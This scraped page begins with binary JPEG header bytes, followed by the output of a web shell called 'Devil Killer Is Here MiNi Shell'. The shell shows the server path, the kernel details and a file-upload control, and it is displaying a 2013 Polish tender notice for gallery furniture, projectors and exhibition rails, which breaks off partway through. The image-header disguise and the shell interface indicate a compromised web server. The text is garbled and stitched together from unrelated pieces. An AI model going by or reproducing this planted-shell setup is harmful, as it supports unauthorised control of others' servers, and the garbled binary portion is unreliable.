JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130822/339080-N-2013.html

<p class="kh_header"><b>Ostrów Wielkopolski: Przetarg nieograniczony na dostawę mebli, urządzeń multimedialnych, systemu ekspozycyjnego oraz żaluzji i rolet okiennych do Powiatowej Galerii Sztuki Współczesnej w Ostrowie Wielkopolskim</b><br>
<b>Numer ogłoszenia: 339080 - 2013; data zamieszczenia: 22.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Galeria Sztuki Współczesnej , ul. Wrocławska 3, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 62 735 49 54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-ostrowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowa Galeria Sztuki Współczesnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę mebli, urządzeń multimedialnych, systemu ekspozycyjnego oraz żaluzji i rolet okiennych do Powiatowej Galerii Sztuki Współczesnej w Ostrowie Wielkopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli, urządzeń multimedialnych, systemu ekspozycyjnego oraz żaluzji i rolet okiennych do Powiatowej Galerii Sztuki Współczesnej w Ostrowie Wielkopolskim. Wyposażenie będące przedmiotem zamówienia musi zostać dostarczone pod adres: ul. Królowej Jadwigi 8 - 10 w Ostrowie Wielkopolskim. Wszelkie czynności związane z rozładunkiem transportu - dostawy spoczywają na wykonawcy.
Szczegółowy zakres został określony w opisie przedmiotu zamówienia dla poszczególnych części postępowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.30.00-9, 32.32.20.00-6, 39.30.00.00-5, 39.15.10.00-5, 39.13.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.

Zamawiający dokona oceny spełniania warunku udziału w postępowaniu na podstawie załączonego do oferty oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu na podstawie załączonego do oferty oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu na podstawie załączonego do oferty oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu na podstawie załączonego do oferty oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu na podstawie załączonego do oferty oświadczenia wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy oraz pozostałe oświadczenia i formularze wymagane przez siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-ostrowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ostrowie Wielkopolskim, Al. Powstańców
Wielkopolskich 16, 63 - 400 Ostrów Wielkopolski, pok. 228 - II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2013 godzina 08:15, miejsce: Powiatowa Galeria Sztuki
Współczesnej, ul. Wrocławska 3 w Ostrowie Wielkopolskim.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Meble konferencyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: 
A. Stoły konferencyjne - 20 szt.
B. Krzesła konferencyjne - 150 szt. 
C. Wózki do przewożenia sztaplowanych krzeseł - 8 szt.
D. Krzesła pracownicze - 3 szt.

A. Stół konferencyjny o wymiarach 1390 x 750 mm i wysokości 730 mm. Blat wykonany z płyty melaminowej (kolor: orzech) o grubości 25 mm z obrzeżem ABS, wzmocniony przeciw uginaniu się, z mocowaniami stelaża (mufy) zapobiegającymi wyrywaniu śrub podczas rozkładania. Stelaż stalowy, chromowany, w kształcie odwróconej litery T, o szerokości podstawy 600 mm, wyposażonej w stopy zapobiegające zarysowaniu podłoża, wykonany z elementów o grubości od 30 do 40 mm, łączonych niewidocznym spawem, z zastrzałami blokującymi nogi w położeniu rozłożonym jak i złożonym, składany pod blatem, w sposób umożliwiający sztaplowanie złożonych stołów, z dystansami (stopy, nakładki) o powierzchni zapobiegającej uszkodzeniu blatu na którym spoczywają.
Gwarancja 5 lat, od daty odbioru dostawy.
Do oferty należy dołączyć fotografię proponowanego produktu.
B. Krzesło konferencyjne, stacjonarne na 4 nogach bez podłokietników z kubełkowym, plastikowym siedziskiem, o wymiarach: wysokość całkowita krzesła 795 mm, szerokość całkowita krzesła 540 mm, głębokość całkowita krzesła 515 mm (szerokość siedziska 445 mm mierzona w najszerszym miejscu, głębokość siedziska 420 mm, wysokość siedziska 450 mm, szerokość oparcia 415 mm mierzona w najszerszym miejscu, wysokość oparcia 390 mm). Kubełkowe jednoelementowe siedzisko z oparciem wykonanym z wysokogatunkowego, wytrzymałego i elastycznego tworzywa (np. polipropylen), o geometrycznym prostym kształcie, wyprofilowane w dwóch płaszczyznach i z powierzchnią zapobiegającą ześlizgiwaniu się (porowatość), z otworem - uchwytem umożliwiającym łatwe przenoszenie; 120 szt. w kolorze granatowym, i po 10 szt. w kolorach: pomarańczowym, czerwonym i zielonym. Stelaż wykonany ze stalowej, chromowanej rury o średnicy 19 mm, mocowany wyłącznie pod siedziskiem, o kształcie odwróconej litery V, zakończony plastikowymi stopkami o kształcie klina i wyposażone w metalowe, chromowane łączniki hakowe do łączenia krzesła w rzędy przyspawane do konstrukcji. Plastikowe stopy przedłużone łukowo do wewnątrz krzesła, w sposób odpowiadający średnicy rury stelaża, ułatwiający sztaplowanie i dystansujący stelaże podczas układania na sobie kolejnych krzeseł. Funkcja sztaplowania do 20 sztuk krzeseł na przystosowanych do tego wózkach.
Do oferty należy dołączyć wyniki badań zgodności z normą EN 13761:2002 i EN 1728:2000 w zakresie wymagań wytrzymałościowych i bezpiecznych rozwiązań konstrukcyjnych. 
Gwarancja 5 lat, od daty odbioru dostawy.
Do oferty należy dołączyć fotografię proponowanego produktu.
C. Wózek do przewożenia krzeseł umożliwiający sztaplowanie do 20 sztuk krzeseł, wykonany ze stalowej, chromowanej rury o średnicy 22 mm, wyposażony w kółka, o średnicy 80 mm.
Gwarancja 5 lat, od daty odbioru dostawy.
Do oferty należy dołączyć fotografię proponowanego produktu.
D. Krzesła pracownicze, obrotowe, o wymiarach: wysokość całkowita krzesła 870-1040 mm, szerokość całkowita krzesła 680 mm, głębokość całkowita krzesła 700 mm (szerokość siedziska 490 mm mierzona w najszerszym miejscu, głębokość siedziska 440 mm, wysokość siedziska 430-530 mm), na pięcioramiennej plastikowej podstawie w kolorze czarnym z kółkami przystosowanymi do paneli podłogowych, wyposażonymi w hamulec, który zapobiega odjeżdżaniu krzesła bez obciążenia lub odpowiednimi miękkimi stopami; z podnośnikiem gazowym zapewniający płynną regulację wysokości siedziska, które wykonane jest na bazie sklejki, wyściełane pianką poliuretanową o gęstości min. 75 kg/m3  o wysokiej odporności na zgniatanie i tapicerowane tkaniną poliestrową w kolorze, o gramaturze 380g/m2 i wysokiej odporności na ścieranie (min 100000 cykli Martindale a) i piling (4-5), trudno zapalną i odporną na działanie światła (4-5); ażurowe oparcie z wysokogatunkowego polipropylenu, z dołączoną tapicerowaną nakładką z przodu oparcia i wieszakiem na ubranie z tyłu oparcia. Regulowane w min. 4 płaszczyznach: wysokość i głębokość siedziska, wysokość i wychylenie oparcia (mechanizm umożliwiający synchroniczne odchylanie oparcia i siedziska, z regulacją sprężystości odchylania w zależności od ciężaru siedzącego oraz czterostopniową blokadą tego ruchu) z miękkimi poliuretanowymi podłokietnikami regulowanymi w 3 płaszczyznach (góra - dół, przód - tył, obrót prawo - lewo).
Krzesło musi posiadać atest wytrzymałościowy. Gwarancja 5 lat, od daty odbioru dostawy.
Do oferty należy dołączyć fotografię proponowanego produktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Urządzenia multimedialne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: 
A. Projektor multimedialny.
B. Ramię do projektora z montażem.
C. Ekran projekcyjny z montażem.

A. Projektor multimedialny cichy i lekki, z możliwością podwieszenia na ramieniu sufitowym i sterowania bezprzewodowego pilotem, z polskim menu.
Wykonany w technologii LCD, o rozdzielczości Full HD (1920x1080), jasności min. 3000 ANSI Lumenów i kontraście min. 3000:1, z możliwością wyświetlania obrazów na ekranach do 300cali z lampą o żywotności min. 5000 h i głośności pracy nie przekraczającej 35 dB, z automatyczną i ręczną korektą zniekształceń trapezowatych i możliwością korekcji barwnej obrazu.
Wyposażony w gniazda umożliwiające podłączenie możliwie najszerszej gamy urządzeń zewnętrznych - odtwarzaczy DVD, Blu-ray, komputerów, pamięci flash, karty pamięci (HDMI, RJ45, USB typ A i B, D-Sub 15pin, audio RCA Cinch, Stereo Jack, minijack), ewentualnie możliwość połączeń bezprzewodowych Wi-Fi.
Uzupełnienie stanowić musi torba transportowa i pilot sterujący. 
Gwarancja min 3 lata, od daty odbioru dostawy. Do oferty należy dołączyć fotografię proponowanego produktu. Produkt dostarczany z usługą montażu.

B. Ramię sufitowe, białe, dostosowane do wagi projektora, o regulacji w zakresie 40-90 cm.
Gwarancja min 3 lata, od daty odbioru dostawy. Do oferty należy dołączyć fotografię proponowanego produktu. Produkt dostarczany z usługą montażu.

C. Ekran projekcyjny, ramowy, o przekątnej 150 cali(wymiarach 300x220 cm, + 5 cm szerokości czarnego maskowania krawędzi), przystosowany do projektorów LCD w rozdzielczości HD, o gain faktorze 1,0, wykonany z nie falującej tkaniny winylowej (gramatura min. 400 g/m2) z dodatkowa czarna powłoka z tył ekranu, posiadającej certyfikat trudnopalności.
Rozwijany elektrycznie (zasilanie z prawej strony), z przednim wysuwem płótna, ze bezstopniowym sterowaniem pilotem, aluminiowej stabilnej kasecie (kolor biały) podwieszanej do sufitu, posiadający certifikat CE.
Gwarancja min. 3 lata, od daty odbioru dostawy. Do oferty należy dołączyć fotografię proponowanego produktu. Produkt dostarczany z usługą montażu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> System ekspozycyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Szyny nośne - 100 mb
B. Szyny nośne z szyną elektryczną - 30 mb
C. Łączniki proste - 50 szt.
D. Łączniki elektryczne proste - 14 szt.
E. Łączniki elektryczne kątowe - 6 szt.
F. Oprawy oświetleniowe 50 cm - 20 szt.
G. Zaślepki szyny - 30 szt.
H. Linki perlonowe z zaczepem - 200 szt.
I. Linki stalowe z zaczepem - 100 szt.
J. Przesuwne haki sprężynowe do 4 kg -  400 szt.
K. Przesuwne haki samozaciskowe do 15 kg - 200 szt.

A-I. System ekspozycyjny umożliwiający zawieszanie obrazów, antyram i ram na dowolnej wysokości i w dowolnym miejscu ścian galerii.
Oparty na szynie nośnej, aluminiowej, o wysokości 25 mm i grubości 11 mm, znoszące obciążenie do 45 kg na 1 metr bieżący szyny, wyposażonej we wkładkę wewnątrz profilu aluminiowego doprowadzającą prąd o bezpiecznym napięciu 12 Volt (30 mb.), umożliwiającą rozbudowanie systemu o dodatkową wkładkę elektryczną (100 mb.). Szyny, malowane proszkowo na biało, mocowane do ściany na przykręcanych uprzednio zatrzaskach wykonanych (mosiężnych lub z odpowiedniego tworzywa) w sposób umożliwiający ich łatwy montaż i demontaż.
Do zestawu szyny nośnej należy dołączyć odpowiednią ilość zatrzasków montażowych wraz z wkrętami i kołkami rozporowymi oraz wskazaną powyżej ilość łączników i zaślepek. 
Ponadto 20 opraw oświetleniowych na 50 cm wysięgnikach, umieszczanych w dowolnym miejscu listew nośnych (bez żarówek).
Obiekty ekspozycyjne powinno się zawieszać na dostosowanych do ich wagi hakach (samozaciskowych lub sprężynowych, np. max do 4 kg i do 15 kg) przesuwanych na linkach perlonowych (nylonowych) i stalowych o średnicy 2 mm i długości 200 mm, wyposażonej w stalowe zakończenia (np. typu Cobra), pozwalające na ich zaczepienie w dowolnym miejscu szyny nośnej - beż potrzeby wsuwania od początku listwy.
Gwarancja min. 2 lata, od daty odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.30.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> System ekspozycyjny - ramy ekspozycyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Ramy OWZ B1 - 20 szt.
B. Ramy OWZ B2 - 20 szt.

Ramy ekspozycyjne wykonane z profilu aluminiowego (typu OWZ) o szerokości 25 mm, ostro zakończonych narożnikach i w kolorze anodowanego srebra, z tylną płaszczyzną z tworzywa (np. pcw) oraz z przeźroczystą płytą czołową - folia polipropylenowa (dwustronna: połysk - antyrefleks),
z podwójnymi otworami montażowymi na każdej krawędzi ramy.
Gwarancja min. 2 lata, od daty odbioru dostawy. Do oferty należy dołączyć fotografię proponowanego produktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.30.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Meble magazynowe z montażem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A. Regały magazynowe z montażem - 8 szt.
B. Wózki magazynowe - 15 szt.

A. Regały magazynowe, ażurowe, stabilne, wykonane z profili stalowych, o wymiarach 50 x 40 mm (profil pełny lub systemowy), malowanych proszkowo (kolor RAL 7039 Quarzgrau lub jasny szary) ustawione na plastikowych stopach. Półki z min. 18 mm płyty malaminowej lub mdf (w kolorze szarym lub antracyt) oparte na stalowych wspornikach, z możliwością regulowania ich wysokości, znoszącej obciążenie min. 80 kg każda. Przygotowanie i montaż regałów wg poniższego zestawienia (wysokość x szerokość x głębokość w cm):
a) dwa regały o wymiarach 300 x 378 x 80, podzielone na 6 segmentów o szerokości 63 cm i z 6 półkami każdy;
b) trzy regały o wymiarach 300 x 150 x 100, podzielone na 2 segmenty o szerokości 75 cm i z 3 półkami każdy;
c) jeden regał o wymiarach 300 x 150 x 80, podzielony na 2 segmenty o szerokości 75 cm i z 3 półkami każdy;
d) jeden regał o wymiarach 300 x 240 x 100, podzielony na 3 segmenty o szerokości 80 cm i z 3 półkami każdy;
e) jeden regał o wymiarach 300 x 150 x 40, podzielony na 3 segmenty o szerokości 50 cm i z 6 półkami każdy.
Gwarancja min. 2 lata, od daty odbioru dostawy.
Produkt dostarczany z usługą montażu.

B. Wózki magazynowe, ażurowo zabudowane, wykonane z profili stalowych, o wymiarach 20 x 20 mm, malowanych proszkowo (kolor RAL 7039 Quarzgrau lub jasny szary), z platformą z min. 18 mm płyty malaminowej lub mdf (w kolorze szarym lub antracyt) na 4 kółkach o średnicy min. 5 cm (w tym dwa skrętne z hamulcami), o nośności min. 100 kg każdy. Zabudowa wózka otwarta od strony krótszego boku dla umożliwienia załadunku i rozładunku, wyposażona w uchwyt na przeciwległym boku. 
